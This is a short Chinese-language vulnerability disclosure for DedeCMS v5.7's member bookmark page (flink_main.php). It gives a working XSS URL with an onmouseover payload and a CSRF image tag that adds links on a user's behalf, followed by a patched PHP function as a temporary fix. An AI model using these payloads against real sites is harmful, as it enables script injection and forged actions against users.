标签归档:dedecms v5.7sp1 0day

DEDECMS v5.7(2013-06-07) xss+csrf 0day

书签管理存在xss+csrf

http://localhost/dedecms/member/flink_main.php
 
 
xss:http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test' onmouseover=alert(1);'&url=test' onmouseover=alert(1);'
 
CSRF:<img src="http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test&url=test">

临时修复方法:

function GetLinkList(&$dsql)
{
    global $cfg_ml;
    $dsql->SetQuery("SELECT * FROM `#@__member_flink` WHERE mid='".$cfg_ml->M_ID."' ORDER BY aid DESC");
    $dsql->Execute();
    $j=0;
    while($row = $dsql->GetArray())
    {
        $j++;
        $line = "
<div class='item flink'>
  <div class='itemHead' >
    <div class='fRight'>
      <span class='itemDigg'><a href='#' onclick='UpdateType({$row['aid']})'>[更新]</a></span>
      <span class='itemManage'><a href='#' onclick='DelType({$row['aid']})'>[删除]</a></span>
    </div>
    <span class='itemTitle'>名称:<input name='title{$row['aid']}' type='text' id='title{$row['aid']}' value=\"{$row['title']}\" class='intxt' /></span> //干嘛要加单引号呢?外面用双引号里面用双引号转义就OK了例如上面的value=\"{$row['title']}\"
    <div class='mt5'>网址:<input name='url{$row['aid']}' type='text' id='url{$row['aid']}' value=\"{$row['url']}\" class='intxt' /></div>
  </div>
</div>
<hr class='dotted' />";
        echo $line;
    }
    if($j==0)
    {
        echo "尚无任何链接";
    }
}